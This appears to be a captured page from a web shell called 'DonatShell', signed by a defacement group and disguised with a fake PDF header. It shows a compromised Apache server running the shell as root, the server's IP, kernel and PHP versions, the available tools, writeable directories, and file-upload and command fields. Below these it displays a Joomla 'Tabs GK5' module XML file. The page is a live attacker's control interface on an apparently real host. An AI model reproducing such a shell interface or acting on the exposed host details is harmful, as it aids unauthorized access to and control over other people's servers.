%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.248
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/old/modules/mod_tabs_gk5/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/www/html/old/modules/mod_tabs_gk5/mod_tabs_gk5.xml
<?xml version="1.0" encoding="utf-8"?>
<extension type="module" version="3.0" client="site" method="upgrade">
	<name>Tabs GK5</name>
	<author>GavickPro</author>
	<creationDate>30/06/2015</creationDate>
	<copyright>Copyright (C) 2011-2015 GavickPro. All rights reserved.</copyright>
	<license>GNU General Public License version 2 or later</license>
	<authorEmail>info@gavick.com</authorEmail>
	<authorUrl>www.gavickpro.com</authorUrl>
	<version>1.7.4</version>
	<description><![CDATA[
		<style type="text/css">
			span.readonly { padding: 10px; font-family: Arial; font-size:13px !important; font-weight: normal !important; text-align: justify; color: #4d4d4d; line-height: 24px; }
			span.readonly h1 { clear:both; font-family: Georgia, sans-serif; font-size:38px; margin:30px 20px 23px; padding:0px 0px 24px 10px; color:#333; border-bottom: 1px solid #eee; font-weight: normal; }
			span.tooltip-content { display: none; }
			.tip-text span.readonly { display: none; }
			.tip-text span.tooltip-content { display: block; }
			span.readonly p { margin: 0 26px 10px }
			span.readonly p a { color: #2F4C6D }
			span.readonly p.homepage { margin-top: 30px }
			span.readonly p.license { border-top: 1px solid #eee; font-size: 11px; margin: 30px 26px 0; padding: 6px 0; }
		</style>
		
		<span class="readonly"><h1>Tabs GK5<small>ver. 1.7.4</small></h1><p>GK5 is one product of the next generation of GavickPro extensions designed exclusively for Joomla 2.5+.</p><p>With the Tabs GK5 module, you can implement space-saving tabs on websites and incorporate a variety of content types via modules or user-defined custom HTML code.  Thanks to the tab management system we've integrated into the module, Tabs GK5 remains easy, intuitive and quick to configure.  With built-in support for external data sources, the possibilities for implementing this new release are unlimited!</p> <p class='homepage'><a href='https://www.gavick.com/best-free-joomla-tab-module.html' target='_blank'>Learn more at the Tabs GK5 project website.</a></p><p class='license'>Tabs GK5 is released under the <a target="_blank" href="http://www.gnu.org/licenses/gpl-2.0.html">GNU/GPL v2 license.</a></p></span>
		<span class='tooltip-content'>Advanced tabs module for Joomla! 3.x</span>
	]]></description>
	<files>
		<filename module="mod_tabs_gk5">mod_tabs_gk5.php</filename>
		<filename module="mod_tabs_gk5">mod_tabs_gk5.xml</filename>
		<filename module="mod_tabs_gk5">helper.php</filename>
		<filename module="mod_tabs_gk5">index.html</filename>
		<folder>admin</folder>
		<folder>config</folder>
		<folder>external_data</folder>
		<folder>styles</folder>
		<folder>scripts</folder>
		<folder>tmpl</folder>
	</files>
	
	<updateservers>
		<server type="extension" priority="1" name="Tabs GK5 Updates">https://www.gavick.com/update_server/joomla30/tabs_gk5.xml</server>
	</updateservers>
	
	<languages>
		<language tag="en-GB">language/en-GB.mod_tabs_gk5.ini</language>
	</languages>
	
	<config>
		<fields name="params" addfieldpath="/modules/mod_tabs_gk5/admin/elements">
			<!-- basic -->
			<fieldset name="TABS_BASIC">
				<field type="asset" path="modules/mod_tabs_gk5/admin/" />
				
				<field name="config_manager" type="configmanager" directory="modules/mod_tabs_gk5/config/" />
				
				<field name="automatic_module_id" type="radio" class="btn-group" default="1" label="MOD_TABS_AUTOMATIC_MODULE_ID" description="MOD_TABS_AUTOMATIC_MODULE_ID_DESC">
				        <option value="0">MOD_TABS_DISABLED</option>
				        <option value="1">MOD_TABS_ENABLED</option>
				</field>
				
				<field name="module_id" type="text" default="gk-tab-1" label="MOD_TABS_MODULE_ID" description="MOD_TABS_MODULE_ID_DESC" />
				
				<field name="moduleclass_sfx" type="text" default="" label="MOD_TABS_GK5_MODCLASSSUFFIX" description="MOD_TABS_GK5_MODCLASSSUFFIX_DESC" />
				
				<field name="module_data_source" type="list" default="tabsmanager" label="MOD_TABS_DATA_SOURCE" description="MOD_TABS_DATA_SOURCE_DESC">
				        <option value="tabsmanager">MOD_TABS_BUILD_IN_TABSMANAGER</option>
				        <option value="external">MOD_TABS_EXTERNAL_FILES</option>
				</field>
			</fieldset>
			<!-- tab manager -->
			<fieldset name="TABS_MANAGER">
				<field type="tabmanager" name="tabs_data" />
			</fieldset>
			<!-- external sources -->
			<fieldset name="EXTERNAL_SOURCES">				
				<field name="external_source" type="filelist" default="" label="MOD_TABS_GK5_EXTERNAL_SOURCE" description="MOD_TABS_GK5_EXTERNAL_SOURCE_DESC" directory="modules/mod_tabs_gk5/external_data" filter="(\.xml|\.json)$" stripext="" hide_default="hide_default" />
			</fieldset>
			<!-- interface -->
			<fieldset name="TABS_INTERFACE">
				<field name="styleCSS" type="list" default="style1" label="MOD_TABS_STYLE_CSS" description="MOD_TABS_TABS_STYLE_CSS_DESC">
				        <option value="style1">MOD_TABS_STYLE1</option>
				        <option value="style2">MOD_TABS_STYLE2</option>
				        <option value="style3">MOD_TABS_STYLE3</option>
				        <option value="style4">MOD_TABS_STYLE4</option>
						<option value="style5">MOD_TABS_STYLE5</option>
				        <option value="style6">MOD_TABS_STYLE6</option>
				</field>
				
				<field name="module_auto_height" type="radio" class="btn-group" default="1" label="MOD_TABS_MODULE_AUTO_HEIGHT" description="MOD_TABS_MODULE_AUTO_HEIGHT_DESC">
				        <option value="0">MOD_TABS_DISABLED</option>
				        <option value="1">MOD_TABS_ENABLED</option>
				</field>
				
				<field name="module_height" type="text" size="1" class="input-pixels text_area input-medium" default="200" label="MOD_TABS_MODULE_HEIGHT" description="MOD_TABS_MODULE_HEIGHT_DESC" />
				
				<field name="tabs_position" type="radio" class="btn-group" default="top" label="MOD_TABS_TABS_POSITION" description="MOD_TABS_TABS_POSITION_DESC">
				        <option value="top">MOD_TABS_TOP</option>
				        <option value="bottom">MOD_TABS_BOTTOM</option>
				        <option value="left">MOD_TABS_LEFT</option>
				        <option value="right">MOD_TABS_RIGHT</option>
				        <option value="disabled">MOD_TABS_DISABLED</option>
				</field>
				
				<field name="tabs_pre_text" type="text" size="20" default="" label="MOD_TABS_PRE_TEXT" description="MOD_TABS_PRE_TEXT_DESC" />

				<field name="tabs_width" type="text" size="1" class="input-pixels text_area input-medium" default="200" label="MOD_TABS_TABS_WIDTH" description="MOD_TABS_TABS_WIDTH_DESC" />
				
				<field name="tabs_spans" type="radio" class="btn-group" default="0" label="MOD_TABS_SPANS" description="MOD_TABS_SPANS_DESC">
				        <option value="0">MOD_TABS_DISABLED</option>
				        <option value="1">MOD_TABS_ENABLED</option>
				</field>
				
				<field name="buttons" type="radio" class="btn-group" default="1" label="MOD_TABS_BUTTONS" description="MOD_TABS_BUTTONS_DESC">
				        <option value="0">MOD_TABS_DISABLED</option>
				        <option value="1">MOD_TABS_ENABLED</option>
				</field>
			</fieldset>
			<!-- animation -->
			<fieldset name="TABS_ANIMATION">
				<field name="activator" type="list" default="click" label="MOD_TABS_ACTIVATOR" class="input-medium" description="MOD_TABS_ACTIVATOR_DESC">
				        <option value="click">MOD_TABS_CLICK</option>
				        <option value="mouseenter">MOD_TABS_MOUSEOVER</option>
				</field>
				
				<field name="mobile_swipe" type="list" class="gk_switch" default="0" label="MOD_TABS_MOBILE_SWIPE" description="MOD_TABS_MOBILE_SWIPE_DESC">
					<option value="0">MOD_TABS_DISABLED</option>
					<option value="1">MOD_TABS_ENABLED</option>
				</field>
				
				<field name="animation" default="1" type="radio" class="btn-group" label="MOD_TABS_AUTO_ANIMATION" description="MOD_TABS_AUTO_ANIMATION_DESC">
				        <option value="0">MOD_TABS_DISABLED</option>
				        <option value="1">MOD_TABS_ENABLED</option>
				</field>
				
				<field name="animation_interval" type="text" class="input-ms input-medium" default="5000" label="MOD_TABS_ANIMATION_INTERVAL" description="MOD_TABS_ANIMATION_INTERVAL_DESC" />
				
				<field name="animation_type" type="radio" class="btn-group" default="opacity" label="MOD_TABS_ANIMATION_TYPE" description="MOD_TABS_ANIMATION_TYPE_DESC">
				        <option value="opacity">MOD_TABS_OPACITY</option>
				        <option value="slide_vertical">MOD_TABS_SLIDE_VERTICAL</option>
				        <option value="slide_horizontal">MOD_TABS_SLIDE_HORIZONTAL</option>
				        <option value="scale">MOD_TABS_SLIDE_SCALE</option>
				        <option value="rotate_x">MOD_TABS_SLIDE_ROTATE_X</option>
				        <option value="rotate_y">MOD_TABS_SLIDE_ROTATE_Y</option>
				        <option value="rotate_z">MOD_TABS_SLIDE_ROTATE_Z</option>
				</field>

			</fieldset>
			<!-- advanced -->
			<fieldset name="TABS_ADVANCED">
			
				<field name="initial_tab" type="text" class="input-medium" default="1" label="MOD_TABS_INITIAL_TAB" description="MOD_TABS_INITIAL_TAB_DESC" />
				
				<field name="url_tab_selection" type="radio" class="btn-group" default="1" label="MOD_TABS_URL_TAB_SELECTION" description="MOD_TABS_URL_TAB_SELECTION_DESC">
				        <option value="0">MOD_TABS_DISABLED</option>
				        <option value="1">MOD_TABS_ENABLED</option>
				</field>
				
				<field name="cookie_tab_selection" type="radio" class="btn-group" default="0" label="MOD_TABS_COOKIE_TAB_SELECTION" description="MOD_TABS_COOKIE_TAB_SELECTION_DESC">
				        <option value="0">MOD_TABS_DISABLED</option>
				        <option value="1">MOD_TABS_ENABLED</option>
				</field>
				
				<field name="parse_plugins" type="radio" class="btn-group" default="1" label="MOD_TABS_PARSE_PLUGINS" description="MOD_TABS_PARSE_PLUGINS_DESC">
				        <option value="0">MOD_TABS_DISABLED</option>
				        <option value="1">MOD_TABS_ENABLED</option>
				</field>
				
				<field name="module_wrap" type="radio" class="btn-group" default="0" label="MOD_TABS_MODULE_WRAP" description="MOD_TABS_MODULE_WRAP_DESC">
				        <option value="0">MOD_TABS_DISABLED</option>
				        <option value="1">MOD_TABS_ENABLED</option>
				</field>
				
				<field name="useCSS" type="list" default="1" class="input-medium" label="MOD_TABS_USE_CSS" description="MOD_TABS_USE_CSS_DESC">
				        <option value="0">MOD_TABS_FORCE_DISABLED</option>
				        <option value="1">MOD_TABS_FORCE_ENABLED</option>
				</field>
				
				<field name="useScript" type="list" default="1" class="input-medium" label="MOD_TABS_USE_SCRIPT" description="MOD_TABS_USE_SCRIPT_DESC">
				        <option value="0">MOD_TABS_FORCE_DISABLED</option>
				        <option value="1">MOD_TABS_FORCE_ENABLED</option>
				        <option value="2">MOD_TABS_AUTOMATIC</option>
				</field>
				
				<field name="engine_mode" type="radio" class="btn-group" default="mootools" label="MOD_TABS_ENGINE_MODE" description="MOD_TABS_ENGINE_MODE_DESC">
						<option value="mootools">MOD_TABS_MODE_MOOTOOLS</option>
						<option value="jquery">MOD_TABS_MODE_JQUERY</option>
				</field> 
				
				<field name="include_jquery" type="radio" class="btn-group" default="0" label="MOD_TABS_INCLUDE_JQUERY" description="MOD_TABS_INCLUDE_JQUERY_DESC">
				        <option value="0">MOD_TABS_DISABLED</option>
				        <option value="1">MOD_TABS_ENABLED</option>
				</field>
				
				<field name="rtl" type="radio" class="btn-group" default="0" label="MOD_TABS_RTL_SUPPORT" description="MOD_TABS_RTL_SUPPORT_DESC">
				        <option value="0">MOD_TABS_DISABLED</option>
				        <option value="1">MOD_TABS_ENABLED</option>
				</field>
			</fieldset>
			<fieldset name="advanced">
				<field name="layout" type="modulelayout" label="JFIELD_ALT_LAYOUT_LABEL" description="JFIELD_ALT_MODULE_LAYOUT_DESC" />
			</fieldset>
			<!-- about us -->
			<fieldset name="TABS_ABOUT_US" addfieldpath="/modules/mod_tabs_gk5/admin/elements">
			    <field type="about" name="about_us" /> 
			</fieldset>
		</fields>
	</config>
</extension>

Anon7 - 2022
AnonSec Team